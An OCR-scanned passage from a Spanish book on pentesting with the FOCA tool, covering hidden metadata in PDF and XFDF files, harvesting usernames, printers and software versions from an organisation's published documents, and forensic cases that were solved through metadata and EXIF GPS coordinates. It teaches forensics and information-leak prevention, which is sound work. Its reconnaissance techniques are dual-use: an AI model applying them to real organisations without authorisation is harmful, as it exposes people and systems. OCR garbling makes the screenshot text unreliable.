realizando  la  fase  d z  footprinting  y  fingerprinting  de  un  pentesting  y  preocuparse  de  ellos  cuando  se 
este  realizandu  un  proceso  de  Data  Loss  Prevention. 


Data  relating  to  dates 

Users  found 

-i>  Created  on:  14-NOV-20G7  16:21:18 

&HA 

V  Modified  on:  13- MAR- 20 13  19:52:34 
®  Printed  on:  29-APR-2012  18:20:10 

^hhassar 

Generic  metadata  extracted 

Printers  found  on  the  file 

! —  Application:  Microsoft  Office 
&  Encoding:  Latin  1 

Company:  VUU 

Sci  Operating  System:  Windows  7 

&HP  LaserJet  3050  Series  PCL  6 

fmagen  01.54:  Metadatas  en  tic  hero  de  formato  XLL 


Cualquier  fichero  creado  por  una  herramienta  ofirnatica,  sea  cual  sea  esta,  es  susceptible  de  tener 
metadatas,  por  lo  que  se  debe  tener  presente  esa  maxima  en  cualquier  situation. 


Metadatos  en  formatos  Postscript  y  PDF 

Son  muy  comimes  hoy  en  dia  ios  ficheros  publicados  en  formato  PDF  ( Portable  Document  Format ), 
ya  que  tienen  la  capacidad  de  hacerpensar  a  muehos  usuarios  que  no  tienen  metadatos  o  informaeion 
oculta. 

Nada  mas  lejos  de  la  realidad, 

Ademas,  el  formato  PDF  t s  uno  de  los  mas  complejos  hoy  en  dia,  permitiendo  tambien  ejecucion  de 
codigo  y  diferentes  opciones  a  lo  largo  de  sus  diferentes  version  es, 

En  la  actu alidad,  la  version  1.7  es  la  mas  popular,  aunque  ya  se  esta  trabajando  en  estandarizar  la 
version  2.0  de  die  ho  formato. 

Los  metadatas  en  este  tipo  de  documentos  tienen  una  ubicaeion  destacada,  ya  que  por  defeeto  se 
uiiliza  el  e stand ar  de  ISO  XMP  (Extensible  Metadata  Platform)  que  no  es  mas  que  un  formato  XML 
que  permits  definir  los  campos  para  abnacenar  los  metadatos,  por  lo  que  bastaria  con  revisar  esos 
campos  para  poder  leer  los  metadatos  de  un  fichero  en  formato  PDF. 

En  cases  como  el  de  las  notas  de  prensa  de  anonymous ,  fue  tan  sencillo  como  eso  para  descubrir  que 
un  disenador  grafico  cn  3D,  de  nombre  Alex  Tapanaris,  estaba  formando  parte  de  la  organization,  ya 
que  en  los  campos  XMP  se  podia  leer  su  nombre. 


54 


Pentesting  con  FOCA 


Imagen  0 1 .55:  Metadatas  en  nota  de  prensa  en  formato  PDF  de  anonymous. 


Sin  embargo,  esto  puede  ser  infinitamente  mas  complejo,  debido  a  que  existen  muchas  impresoras 
virtuales  y  muchas  aplicaciones  realizando  conversion  de  documentos  procedentes  dc  olros  formatos, 
y  puede  que  l  os  metadatas  y/o  i  n  form  ac  ion  oculta  que  provengan  de  I  os  formatos  dc  doeumento 
originates  queden  mal  ubicados  en  el  doeumento,  por  !o  que  siempre  es  mas  que  recomen dable  hacer 
un  analisis  de  cadenas  de  lexlo  del  fichero  binario  complete . 

Para  evitar  las  fugas  de  inform  ac  ion,  se  recomienda  utilizar  aplicaciones  certificadas  para  la 
manipulacion  del  formato  PDF ,  que  no  lo  son  todas,  aunque  asi  lo  parezea. 


(XML)  Forms  Data  Format 

Entre  las  opciones  de  almacenamiento  y  manipulacion  de  datos,  el  formato  de  doeumento  PDF 
tiene  otros  formatos  de  archive  asoeiados  a  el,  como  son  los  XML  Forms  data.  Fist  os  ficheros  tienen 
extensions  FDF  y  XFDF  y  son,  como  hemos  dicho,  relatives  al  popular  formato  de  documentos 
PDF 

El  primer  o  de  cl l os  Forms  Data  Format  es  el  formato  en  el  que  los  formularies  en  formato  PDF 
guardan  los  dates.  Es  muy  antiguo  y  se  usa  para  hacer  documentos  PDF  que  funcionen  como 
plantillas.  El  s eg undo  de  el  los  XML  Forms  Data  Format  es  equivalente  al  anterior  pero  en  formato 
XML.  Faeil  dc  entender.  El  problem  a  viene  cuando  se  in  ten  tan  local  izar  a  t  raves  de  los  b  use  ad  ores, 
ya  que  en  Google  solo  sal  dr  an  si  se  buscan  esas  extensiones,  es  decir,  ext;  FDF  o  ext  XFDF  y  nunc  a 
cuando  se  buscan  los  ficheros  PDF. 
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En  el  caso  de  Bing  ei  problema  es  el  mismo,  ya  que  el  buscador  no  los  reconoce  como  fieheros  PDF s 
asi  que  en  las  busquedas  de  FJLETYPEiPDF  nunc  a  apareceran  estos  fieheros. 


<?xml  versions'll 
<xfdf  xmlns^l 


M 


encoding=”UTF-8,,?> 


^ref-https: 

^PCTIB2011050003 


-nr 


UISUIIJ 

<f ield  name=" 
<fie!d  name-11 
<field  names* 
<f ield  names* 
<field  names* 
<field  name-1* 
<field  name-” 


receipt 

_ROIB20110000004\1322578478093_view. pdf "/> 


Tile 


t„prescribed_araount,,><value>100.00  (CHF></valuex/f  ield> 
A-CjUUJl&Uf. .1  iS.ij?nr><value>Yes</va  lue></ f  ie  ld> 
aHttj?rjlze(l-offi^rrnajne;,><value>Chekal</value></field> 
s_balance,lxvalue>ll820. 00  {CHF)</valuex/f ield> 
receipt_send_no,rxv3lue>ROI320110000004</value></field> 
balance”xvalue>430.00  (CHF)</valuex/f ield> 
s_amount_paidllxvaliie>0. 00  (CHF)</valuex/f  ield> 


Imagen  01 ,56:  Fichero  XFDF  que  apunta  al  doc  PDF  que  se  usa  como  pfantilla* 


Como  no  hay  opcion  de  utilizar  el  comando  EXT:FPF  o  EXT: XFDF  en  Bing  Hacking ,  entonces 
estamos  obligados  a  buscarlos  utilizando  el  operador  Contains,  que  tan  buenos  resultados  da  siempre 
buscando  paginas  que  enlacen  doemnentos  con  esas  extensiones. 

%FDF-1 * 2 
%aaio 
1  0  ob  j 
« 

/FDF  2  0  R 

» 

endobj 

« 

/Type  /Import  _ 

/  Contact  Inf  o  (  yahoo  *  com ) 

/CMS 

endobj _ 


Image ti  01.57:  Metadatas  en  formato  FPF. 
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En  el  capitulo  anterior  se  ha  mostrado  la  informacion  oeulta,  los  metadatos  y  I  os  datos  perdidos 
que  son  almacenados  en  diferentes  tipos  de  ficheros,  lo  que  puede  convertirse  en  un  riesgo  para 
el  productor  de  la  informacion  si  no  se  realiza  una  gestion  adecuada  al  publicar  o  distribuir  estos 
ficheros.  En  este  segundo  capitulo  se  mostrara  como  utilizar  la  herramienta  FOCA  para  extraer  toda 
esta  informacion  de  una  gran  cantidad  de  tipos  de  archives  desdc  dos  enfoques  diferentes,  Por  una 
pane,  se  analizara  el  uso  de  FOCA  como  herramienta  de  analisis  forense  para  obtener  informacion 
de  archives  que  el  analista  tiene  en  su  poder,  y  por  otro  lado,  se  cstudiara  la  potencia  de  FOCA 
para  realizar  procesos  de  recoLeccion  de  informacion.  automatizando  las  tareas  de  localizacion  de 
ficheros  en  Internet  y  de  extraccion  de  metadatos. 

A  lo  largo  del  capitulo  se  han  incluido  varies  ejemplos  de  cases  forenses  que  fueron  resue  1  to  s  con 
la  informacion  incluida  en  los  metadatas  de  los  ficheros  involucrados  y  de  ataques  quo  podrian 
prepararse  y  llevarse  a  cabo  con  la  informacion  que  FOCA  es  capaz  de  obtener  de  un  dominio 
aaditado.  Con  el  objetivo  de  que  el  lector  tome  conciencia  de  los  riesgos  de  una  mala  polittca  de 
publicacion  de  archives,  se  ha  incluido  una  seccion  dedicada  a  concretar  y  subrayar  estos  riesgos, 
en  la  que  se  hace  mencion  a  otras  aplicaciones  y  a  malware  especializado  que  utiliza  este  tipo  de 
informacion. 

De  hecho,  dentro  del  Esquema  Nacional  de  Seguridad  ?  un  marco  de  segundad  y  confianza  que  debe 
ser  de  aplieacion  obligatoria  por  todas  las  administraciones  y  organ ismos  publicos,  se  ha  dedicado 
un  apartado  espeeifico  a  la  limpieza  de  documentos.  El  capitulo  terminara,  por  tanto,  con  una  seccion 
en  la  que  se  muestran  diferentes  aplicaciones,  teen ic as  y  procedi  m  Sen  tos  que  pueden  utilizarse  para 
que  los  doeumentos  publicados  en  sitios  weh  u  otros  tipos  de  repositories  publicos  no  conlengan 
informacion  quo  pueda  perjudicar  a  la  entidad  productora  de  la  informacion. 


1.  Analisis  de  metadatos  con  FOCA 

En  esta  primera  seccion  se  estudiara  como  utilizar  la  herramienta  FOCA  para  analizar  los  metadatos 
de  ficheros  que  ya  se  encuentren  descargados  en  cl  equipo  local  del  analista.  Para  ello,  tras  iniciar  el 
programs,  es  suficiente  con  arrastrar  el  documerito  dcseado  a  FOCA . 


]  www.boe.es/boe/dias/201 0/0 1  /29/PDF s/BOE-A-20 1 0- 1330 .PDF 
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A  conlimiacion  se  debe  navegar  por  el  panel  de  la  izquierda  y  aceeder  a  la  vista  de  Metadatas^  donde 
se  mostrar6  el  documento  que  acaba  de  cargarse. 


I"  Project  Report  '  I&ols  ..^  Options  Q,  TaskList  1^)  Plugins  £-J  A, bout 
0  %  Nop 


I  ■»  t 
rT1  Dwnarij 

m-  <4  Rotes 

(si  V jlrer nbJrlics 

e  f''  E3SS9 

DcKXjnwrts  (Q/l) 

SI  ■—  Metadata  Sumury 


r 


*£e  5*e  cm  fietypepdf 


Id  Type  URL 

2f  0  QdL  C  \  UsmViwi  \Doojw*i  WdlpiB  Sha*k  odl 


Download  Dowrioad  Date  Size  /massed 

*  22/10/3012  16  3027  150.77  KB  x 


Imagen  02.01:  Vista  de  Metadatas  eon  los  documentos  cargados. 


Para  analizar  el  fiehero  y  obtener  sus  metadatas  se  debc  con  pulsar  con  el  boton  derecho  sobre  el 
arch  i vo  y  seleecionar  la  opcion  de  extraer  metadatas  {Extract  Metadata). 


site  site  com  filetypepdf 


Id 

<5[ 


Type  URL 


Download 

m 

Download  All 

Q 

Delete 

Delete  All 

ft 

Extract  Metadata 

« 

Extract  All  Metada 

'4 

Analyze  Metadata 

Q 

Add  file 

Add  folder 

Add  URLs  from  file 

as 

Link  ► 

Imagen  02.02:  Bxtraer  metadatas  de  un  archive. 


En  ese  memento,  FOCA  analiza  el  fiehero  y,  en  el  panel  izquierdo,  genera  una  entrada  para  el 
documento  analizado.  Si  se  pincha  sobre  el  nombre  del  archive,  en  el  panel  central  se  muestran 
todos  los  metadatas  obtenidos,  entre  los  que  se  encuentran,  tal  y  como  puede  comprobarse  en  la 
figura  02,03,  el  nombre  de  usuario  del  creador  del  documento  y  el  software  que  se  utilizo  para  su 
creacion. 
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Tmagen  02,03:  Metadatas  obtemdos. 


Ademass  expandiendo  cl  menu  desple gable  que  aparece  junto  al  nombre  del  dcliero,  aparecen  los 
metadatas  extraidos  del  fichero  organ  izado  por  categorias,  io  que  facilita  su  visualizaeion. 


B-®  No  pnojed 
S  Network 

Domains 
■+:  •  i  j.  Rotes 
0“  Vulnerabilities 
□■■■  Metadata 


EJ--  Documents  (1/1} 

|  od(1} 

Q-Qf  WireShark.odt 


Q  Folders 


3  Dates 
.  ^  Other  Metad 

* . ^  Software 

Metadata  Summary 


^tribute 

Users  — 
Username 
Username 


Value 


cben 

ies  punt  a  def  vende 


tmagen  02.04:  Metadatas  organizados  por  categorias. 
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Tambien  puede  utilizarsc  FOCA  para  analizar  varios  fichcros  al  mismo  tlempo.  Por  ejemplo,  se 
puede  arrastrar  una  carpeta  completa.  Como  se  muestra  en  la  figura  02.05,  se  han  afiadido  diferentes 
lipos  de  ficheros  ofimaticos  e  imageries. 


Id 

Type 

URL 

I'.:  • 

pdf 

[  C:\Usera ’’■£hen\Docymefi 

“Si 

pdf 

C  /Users  \dTen\Doeumei 

02 

odp 

C  \Usera  Ni^enXDocumei 

3 

odt 

C  :\UsetsSchen\Docume 

;  2f  4 

odt 

C  :\UsefsNdhen\Docume 

05 

□dp 

C  :\Usef3\chen\D0Cuna 

□dp 

C  :\Usefs\chen\DoGume 

odp 

C:\UBets\chen\Documa . 

*8 

pdf 

C:\  Users^chen  \Dccume  j 

P  9 

IPS 

C :\JJ$ere\chen  \Docume 

G0  10 

odt 

C:\UsQRt\chen  \Docume 

tfcll 

pdf 

C  /Users  \dtanM3ocumQ 

Message 

Extract  Meta-deta 


Extract  Alt  Meta  da 


Analyze  Metadata 

Add  file 

Add  folder 

Add  URLs  from  file 


Download  Download  Date 


Size  Anabzed 


efr  Download 

*  22/10/2012 16:35:31  730.05  KB  X 

Download  All 

22/10/201216:35:31  205.65  KB  X 

22/10/201216:35:31  21.51  KB  x 

0  Delete 

22/10/2012 16:35:31  17.4B  KB  x 

Ti  Delete  All 

22/10/2012 16:35:31  233,17  KB  x 

Link 


22/10/2012  16:35:31 
22/10/201216:35:31 
22/10/2012  16:35:31 
22/10/2012  16:35  31 
22/10/2G12  16:35:31 
22/10/2012  16:35:31 


67.54  KB 
339,27  KB 
2.65  MB 
65,22  KB 
150,77  KB 
641 ,09  KB 


fmagen  02.05:  Diierentes  tipos  de  archives  para  analizar  con  FOCA , 


Pi  noli  an  do  sobre  eualquiera  de  los  arehivos  ailadidos,  si  se  selecciona  la  opcion  de  extraer  lodes 
los  metadatas  {Extract  All  Metadata),  FOCA  se  pone  a  trabajar  y  generara  tina  entrada  en  la  parte 
izquierda  para  cada  uno  de  los  ficheros,  organizandolos  por  tipo  de  archive. 

EF  Metadata 

S  Documents  (12/12} 

I  &•{*!.  jpg  (1) 
i  |  a  $3  vsite^  _cica.jpg 
I  90  odp  (4) 

B-Pf  Etiquetado  LAN  cables  das  .  odp 
I  Tema  1  -  Intro  a  la  Admon  odp 

I  i  $-£?  Tema  3  -  Gestion  de  Usuarios  en  ORACLE  odp  ; 
ftt-ffi  Tema  1  odp 

|  ^0-odt{3) 

®-0  Practica  navidena  PAR  2011  .odt 
!  ;  0  Practice  Tema  3. odt 

I  ES-@f  WireShark.odt 
|  a  .pdf  (4) 

activjdades_sad.pdf 
$ DBAJ_9i.pdf 
Si  unixsec-2  1  pdf 
& -^7:  WriterSendllo.pdf 


Jmagcn  02,06:  Fichcros  organ izados  por  tipo  do  archivo. 
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Cuando  se  analizan  varios  ficheros,  la  seccion  de  resumen  de  metadatas  (Metadata  Summary) 
es  muy  util,  ya  que  organiza  en  categorias  la  informacion  encontrada  en  todos  los  archivos.  Ast 
utilizando  las  diferentes  listas  creadas,  podemos  ver  los  usuarios  que  se  ban  encontrado,  el  software 
utilizado  para  su  creation,  los  Sistemas  Operatives,  las  carpetas  compartidas  localizadas,  los  correos 
electron! cos  descubiertos,  etcetera. 


Si  se  pincha,  por  ejemplo,  sobre  la  categoria  Users,  FOCA  mostrara  en  el  panel  central  cuales  son 
los  usuarios  que  se  han  descubierto  en  los  archivos  analizados,  infonnandonos  en  la  columna  Value 
del  numero  de  veces  que  ha  aparecido  cada  usuario  entre  todos  los  hcheros  que  han  si  do  analizados 
hasta  el  momento,  lo  quo  dara  muestra  de  la  importancia  del  usuario  dentro  de  la  organization.  Y 
lomismo  ocurre  para  cada  uno  de  los  elementos  localizados  como  rutas  a  impresoras,  rutas  locales, 
versiones  de  software  utilizadas,  etcetera. 


B'  Documents  {12/12) 

j  f  jpg  0) 

|  vsita_dca  jpg 

Q"ST  (4) 

Etitfuetado  LAN  cableadas.adp 
Tana  1  ■  Intro  a  la  Admon.odp 
S3-  Tema  3  ■  Section  de  Usuarios  en  ORACLE  adp 

S3  Temal.odp 

$  0  .odt  (3) 

i-0  PnacSca  navktefia  PAR  201 1  .odt 
W0  Practice  Tema  3.odt 
Etb0f  WireShark.odt 
llT  Pdf <4> 

S --^7  ac±ividades_sad  pdf 
#-TO  DBA_l_3i.pdf 
ifr-TO  urtDcsec-2.1  pdf 
E  TO  WriterSendlto.pdf 

Metadata  Summary 
■gp  Users  {4} 

Q  Fdders  (S> 
fib  Printer  (3) 


Software  j3) 


-FA  Emails  (1 ) 

#4  Operating  Systems  (2J 
'CL  Passwords  {(3) 

.’J  Senders  (0) 


% 


Attribute 

All  software  found  (9}  -  Times  found 
Writer 

OpenOffice  3,2 
Acrobat  Distitlier  4.05 
OpenOffice  3.2  Build  3433 
QpeoOffjce  33  Build  3567 
Adobe  Photoshop  CS2 
TeX 

pdfTeXT)  13d 
OpenOffice  2.0 


Value 


2 

1 

1 

5 

2 

1 

1 

t 

1 


Imogen  02.07:  Resumen  de  metadatas. 


Por  ultimo,  para  cada  dato  encontrado  FOCA  ofrece  la  posibilidad  de  localizar  y  visual  izar  los 
documentos  en  los  que  aparece  esa  informacion  y  poder  navegar  dc  forma  rapida  hasta  el  elemento 
del  menu  de  documentos  donde  aparece  ese  valor, 

Para  ello  basta  con  pinchar  sobre  el  dato  deseado  eon  el  boton  derecho  y  seleccionar  la  option  de 
buscar  documentos  donde  se  encuentra  este  valor  (Search  documents  where  appears  this  value). 
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Jmagcn  02.08:  Local i/ar  documentor  donde  aparecc  un  determinado  date. 


Metadatos  como  parte  de  una  investigation  forense 

En  esia  section  van  a  plantearse  una  serie  de  easos  forenses  famosos  que  ftjeron  resuekos  analizando 
los  metadatos  de  los  ficheros  implicados.  Para  ello  mostraremos  I  os  resultados  de  su  analisis  con 
FOCA  explicando  las  conclusiones  que  pueden  derivarse  de  cllos,  lo  que  ayudara  al  lector  a  tomar 
una  mayor  conciencia  de  los  riesgos  derivados  de  una  mala  gestion  de  los  metadatos. 


El  informe  Blair 

Se  trala  del  case  que  se  presento  en  el  primer  capitulo  relativo  al  documento  sobre  la  guerra  de  Irak 
que  el  gobiemo  de  Tony  Blair  utilize  para  ju  slid  ear  la  participation  de  Gran  Bretana  en  el  conilicto 
armado. 

Cuando  el  ejecutivo  britanico  es  interrogado  en  el  Parlamento  sobre  la  autoria  del  documento  y  la 
implication  del  gabinete  de  Blair  en  su  elaboration,  el  primer  ministro  y  sg.equipo  niegan  cualquier 
manipulation  del  arc  hi  vo.  No  obstante,  alguien  analizo  los  metadatas  de  la  version  Word  del  d  osier 
que  el  gobiemo  publico  en  el  sitio  web  de  Downing  Street  y  pudo  demostrar  que  Blair  y  su  equipo 
habian  menlido. 

Si  se  analiza  ese  fichero  con  FOCA  se  puede  com  pro  bar  como,  en  efecto,  el  documento  fue  modificado 
por  varios  autores,  cuyos  nombres  de  usuario  se  corresponden  con  miembros  del  gabinete  de  Tony 
Blair,  y  puede  incluso  eomprobarse  que  en  algun  memento  el  archive  se  copio  a  un  disquete  (A:). 

-  jpratt  — ►  John  Pratt ,  trabajador  de  Downing  Street, 

ablackshaw  — *  Alison  Blacks  haw,  asistente  personal  de  la  secretaria  de  prensa  del  primer 
ministro. 

-  Mkhan  — *  Murtaza  Khan,  miembro  junior  del  gabinete  de  prensa  del  primei  ministro. 

-  phamill  — ►  Paul  Hamill ,  trabajador  de  la  oficina  de  asuntos  exteriores. 
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/^tribute 

Value 

1 1 

Username 

MKhan 

Username 

default 

Username 

cic22 

Username 

J  Pratt 

Username 

ablackshaw 

Username 

phamill 

1  VfWIfll  J 

Fofder 

C:\DOC  U  M  E  '1  ^phamiB  \LOCALS  '  1  YTi emp\ 

Folder 

— V 

C:\TEM  P\ 

Folder 

A:\ 

Folder 

CAABackshawX 

Folder 

C ; \W1  N  N  TNProfiles  Vnkhan\Desktop\ 

**  * — ■ - 

Creation  date 

03/02/2003  10:31 :0Q 

Printed  date 

30/01/200322:33:00 

Modified  date 

03/02/2003  12:18:00 

Imagen  02.09:  Metadatas  en  el  infortne  Blair. 


El  lector  puede  realizar  este  mismo  analisis  ya  que,  aunquc  el  gobiemo  britanico  elimino  el 
documento  de  su  web  al  conocersc  la  noticia  en  la  prensa,  el  poder  de  Internet  hizo  que  alguien  que 
lo  habia  deseargado  previamente  lo  colgara  en  un  sitio  web 2  a  disposicion  de  cualquiera  que  quiera 
estudiarlo. 

Localizacion  de  un  defacer 

Este  segundo  caso  estudia  los  ataques  realizados  pOT  un  ciberde'lincuente  que  logro  vulnerar  la 
seguridad  de  varios  sitios  web  pertenecientes  a  la  policia  de  hstados  Unidos.  El  atacante  ademas, 
publico  a  traves  de  una  cucnta  Twitter  los  datos  privados  obtenidos  en  esas  incursiones.  Ademas, 
tras  comprometer  los  servidores,  el  atacante  sustituia  la  web  original  por  una  pagina  con  la  foto 
de  una  senorita  mostrando  un  cartel  en  el  que  aparecia  el  nickname  del  defacer ,  como  forma  dc 
autopropaganda  del  del  ito  comelido. 


El  primer  paso  para  analizar  una  incursion  dc  este  estilo  consiste  en  estudiar  los  ficheros  del  registro 
de  acceso  (access  log)  de  los  servidores  comprometidos.  que  almacenan  la  information  sobre  todas 
las  peticiones  que  se  procesan  y  tienen  una  estructura  similar  a  la  que  sc  muestra  en  la  siguiente 
lines: 

127.0.0.1  -  -  [ 1 0/Oct/2  012 : 13 : 55 : 36  -0700]  "GET  /imagen. gif  HTTP/1.1"  200  2326 


2  HTTP:! 7  w  w  w.  comp  uterhy  tesm  an.  eom/pri v acy/bl &\ r.d oc 
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Como  puede  verse,  el  fichero  de  log  mantiene  in  form ac ion  sobre  la  direccion  IP  del  cliente  (host 
remoto)  que  hizo  la  petieion  al  servidor,  la  f’eeha  y  la  bora  a  la  que  el  servidor  recibio  la  petieion,  la 
linea  de  la  petieion  del  cliente  (con  el  metodo  usado,  el  recurso  solieitado  y  el  protocol o  utilizado), 
el  cod  i  go  de  estado  que  el  servidor  envia  de  vuelta  a  I  cliente  y  el  tamafio  del  objeto  retom  ado 
sin  incluir  las  cabeceras  de  respuesta,  Por  tan  to,  esta  informacion  es  fundamental  para  localizar  la 
direccion  IP  desde  la  que  se  produjo  el  ataque 

A  pesar  de  que  parecla  evidente  que  todos  los  defacements  se  habian  realizado  por  la  misma  persona, 
el  analisis  de  los  bcheros  de  registro  de  acceso  de  los  servidores  establecid  que  las  direcciones  IP 
origen  de  las  conexiories  uttlizadas  para  realizar  los  ataques  a  los  diterentes  servidores  provenian  de 
paises  dislintos,  lo  que  hizo  sospechar  a  los  forenses  que  las  conexiones  podrian  ser  de  la  red  TOR 3 
( The  Onion  Routing). 

El  funcionamiento  de  este  algoritmo  es  bastante  sencillo.  Desde  el  punto  de  vista  del  usuario  de  TOR 
el  software  cliente  que  se  utiliza  es  un  proxy.  Cuando  se  ejecuta  el  cliente  TOR  se  descarga  una  lista 
de  servidores  TOR  (nodos)  disponibles  y,  en  base  a  esta  lista,  el  cliente  genera  un  camino  de  nodos  a 
traves  de  la  red  TOR.  Cada  paquete  enviado  sigue  el  camino  generado,  y  cada  servidor  lo  reenvia  al 
siguiente  node  hasta  que  se  llega  al  node  de  salida,  que  es  quien  realmente  realiza  la  conexion  con 
el  servidor  destino  al  que  se  este  aeeediendo.  Por  tanlo,  el  uso  de  la  red  TOR  impide  a  los  servidores 
conocer  la  direccion  IP  real  del  usuario,  ya  que  a  todos  los  efectos  es  el  nodo  de  salida  quien  ha 
realizado  la  conexion. 

El  propio  provecto  pone  a  disposicion  publica  un  servicio  web4  que  permitc  comprobar  los  nodos 
TOR  de  salida  que  pueden  alcanzar  un  determinate  servidor  en  tiempo  real.  Realizando  una  consulta 
con  las  direcciones  IP  de  los  servidores  comprometidos,  los  invest  ig  ad  ores  com  probaron  que,  en 
efecto,  las  direcciones  IP  origen  desde  las  que  se  habian  realizado  los  ataques  provenian  de  la  red 
TOR. 


#  This  is  a  list  of  all  Tor  exit  nodes  that  can  contact  X.X.X.X  on  Port  30  # 

#  You  can  update  this  list  by  visiting  httpn  ;// check ,  t.orproj  ect .  org/cgi-bin/Tcir- 
BulkExitList ,py?ip=X .X,X, X  # 

1.230. 159. 176 

101 .93 .158 .193 

103.4.16.118 

103,4.19.122 

105,236,141,71 

106,187.36,183 

106,187,36,240 

106,187,37,156 

106,187.38,84 

106.187.90.158 

Imagcti  02. 10:  Lista  de  nodos  TOR  de  salida. 


3  II TTPS : //www.to rproj  cct .  o  re,' 

4  //  TTPS:  //check  .to  rp  roj  cct .  o  rg;  CGI-  b  i  n/To  rB  ul  k  Exit  Li  st  py 
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No  obstante,  realizando  un  andlisis  exhaustivo  de  la  imagen  fue  posible  obtener  information  muy 
valiosa  para  la  investigation,  ya  que  el  autor  de  los  hechos  habia  olvidado  limpiar  sus  metadatas, 
Como  la  fotografia  habia  sido  tomada  con  un  telefono  eon  posicionamiento  GPS  los  datos  EXIF 
contenian  las  coordenadas  GPS  desde  la  que  fuc  tomada  la  imagen. 


Imagen  02.1 1 :  Coordenadas  GPS  en  los  metadatas. 


Aunque  ninguno  de  los  sospechosos  residia  en  la  eiudad  v  la  calle  correspond iente  a  estas 
coordenadas,  los  investigadores  del  FBI  pudieron  compmbar  que  esta  direecion  coincidia  con  la 
de  la  senorita  que  uno  de  los  sospechosos  tenia  catalogada  como  su  novia  en  su  Facebook ,  lo  que 
facilito  que  se  procedi  era  a  su  detenciom 

Seguimiento  de  movimientos 

El  analisis  de  los  metadatas  EXIF  de  las  fotograflas  pudo  utilizarse  tambien  en  cl  caso  de  un  famoso 
delincucntc  que  fue  detenido  y  acusado  de  liaber  perpetrado  varios  robos  en  easas  de  lujo  de  una 
seric  de  poblaciones  espanolas.  El  sospechoso  aporto  como  testigo  en  su  declaration  a  su  companera 
sentimental,  la  cual  afirmaba  que  habia  estado  con  el  en  otra  eiudad  los  dias  que  se  habian  cometido 
los  robos. 
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Sospechando  que  pudiera  tratarse  de  un  falso  testimonies  los  investi  gad  ores  confiscan  el  telefono 
movil  del  acusado  para  tratar  de  enconlrar  pruebas  de  su  presencia  en  estas  poblaciones,  pero  este 
se  niega  a  entregar  el  codigo  pin  que  protege  el  acceso  al  terminal,  tin  un  primer  memento  se  trata 
de  realizar  un  ataque  de  fuerza  bruta,  pero  el  codigo  pin  results  ser  de  una  longitud  de  1 1  caracteres, 
lo  que  imposibilita  desarrollar  un  ataque  de  estas  earacteristicas.  Ademas,  la  version  del  telefono  no 
permite  realizar  un  jail  break,  por  lo  que  no  se  puede  exlraer  demasiada  informacion  de  el. 

No  obstante,  gracias  a  la  tecnica  conocida  como  JuiceJacking,  lo$  forenses  logran  descargar  todos 
los  datos  del  usuario  y  aeceder  a  las  fotografias  almacenadas  en  el.  El  JuiceJacking  consiste  en 
conectar  un  cable  USB  al  puerto  USB  del  telefono,  puerto  que  se  usa  tanto  para  cargar  el  dispositive 
como  para  trail  sferir  informacion  hacia  o  desde  un  ordenador,  y  tratar  de  copiar  todos  los  datos 
almacenados  en  el  dispositive  y  en  su  laijela  de  memoria. 

Una  vez  que  los  forenses  tienen  acceso  a  las  imagenes,  pueden  analizar  los  metadatas  de  las 
fotografias  tomadas  en  las  fechas  en  las  que  se  cometieron  los  robos  para  tratar  de  corroborar  la 
version  aportada  por  la  testigo  en  su  declaration  y,  por  tanto,  decidir  si  el  acusado  debia  ser  puesto 
en  libertad. 

No  obstante,  tal  y  como  se  muestra  en  la  siguiente  tahla,  con  la  informacion  obtenida  con  FOCA 
relativa  a  las  coordinadas  GPS ,  fechas  y  boras  de  las  fotografias  almacenadas  en  el  telefono 
del  acusado,  los  mvestigadores  son  capaces  de  demostrar  que  la  testigo  habi'a  mentido  y  que  el 
sospechoso  si  habia  estado  en  las  ciudades  involueradas  en  el  caso  los  mismos  dias  en  los  que  se 
perpetraron  los  delitos. 


Delito 

i 

Fecha 

Metadatos  de  la  fotografia 

Ciudad  en  la 
que  se  tomo  la 
lotografia 

Robo  en  un 
aparcamiento  de 
una  urbanization 
de  Sevilla 

21/04/12 

~GPS Latitude  37”23’9,419975  N 

GPS  Longitude  5”59’29,63997  W 

Date/Time  2012:04:21  14:23:39 

Sevilla 

Robo  en  una 

casa  de  Granada 

23/04/12 

GPS  Latitude  37”10’52, 01998  N 

GPS  Longitude  3”3  5’ 32,40005  W 

Date/Time  2012:04:23  20:34:31 

Granada 

Asalto  a  un  ehale 

de  Valencia 

25/4/12 

GPS  Latitude  39”27’ 16,1 3995  N 

GPS  Longitude  0”2 1*4,920044  W 

Date/Time  2012:04:25  17:34:21 

Valencia 

Capitulo  II.  A  nails  is  y  limpieza  de  Metadatas 
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Delito 

Fecha 

Metadatos  de  la  fotograffa 

Ciudad  en  la 
que  se  tomo  la 
fotografia 

Robo  en  una 
casa  de  lujo 
de  Las  Rozas, 
Madrid 

27/04/12 

GPS  Latitude  40”25’ 7, 6800 16  N 

GPS  Longitude  3”41’35, 28008  W 

Date/Time  2012:04:27 

15:04:44 

Madrid 

Pirateria  de  software 


En  este  ultimo  caso  se  va  a  suponer  que  la  empresa  Microsoft  ha  solicitado  una  inspeccion  de 
software  de  una  eompafiia  poT  sospechar  que  esta  puede  e&tar  incurriendo  en  un  delito  de  uso  i  legal 
de  software. 

Antes  de  eonceder  la  orden  de  inspeccion  el  juez  decide  solicitor  a  un  perito  que  evalue  los  indicios 
de  utilizacion  de  software  sin  licencia  por  parte  de  la  cotnpafna  acusada.  Para  ello,  el  perito  forense 
procede  a  recoger  evideneias,  que  en  este  caso  se  trato  dc  documentos  publicos  disponibles  en  el 
sitio  web  de  la  empresa  investigada,  con  el  objetivo  de  elaborar  una  lista  de  software  usado  por 
esta  coin  pah  ia?  determinar  que  version  es  de  diferentes  aplicaciones  estan  siendo  utilizadas  por 
cada  usuario  y,  en  definitiva,  lograr  esclarecer  si  existen  indicios  suficientes  para  afirmar  que  algiin 
usuario  esta  utilizando  versiones  de  algun  programa  sin  contar  con  licencia  de  uso  (por  ejempfo,  si 
se  comprueba  que  se  ha  usado  Microsoft  Office  2010  cuatido  la  empresa  solo  ha  cotnprado  licencias 
de  Microsoft  Office  2000 ). 

Tras  localizar,  descargar  y  analizar  con  FOCA  algunos  de  los  archives  que  la  empresa  tiene 
publicados  es  su  web,  el  perito  ha  preparado  la  siguiente  Usta  de  software  utilizado  para  la  creaeion 
de  los  fieheros: 


1  ♦  Adobe  Photoshop  CS4 

2.  Writer 

3.  OpenOffiee  3.0 

4.  OpenOffiee  3.2 

5.  OpenOffiee  3.3 

6.  Microsoft  Office  2007 

7.  Microsoft  Office  2010 

8.  Microsoft  Office  XP 

9.  Acrobat  Distillier  6.0.0 


10.  GPL  Ghostscript  8,64 

11.  PDFGreator  0+9+8  Windows 

12.  GPL  Ghostscript  9.05 

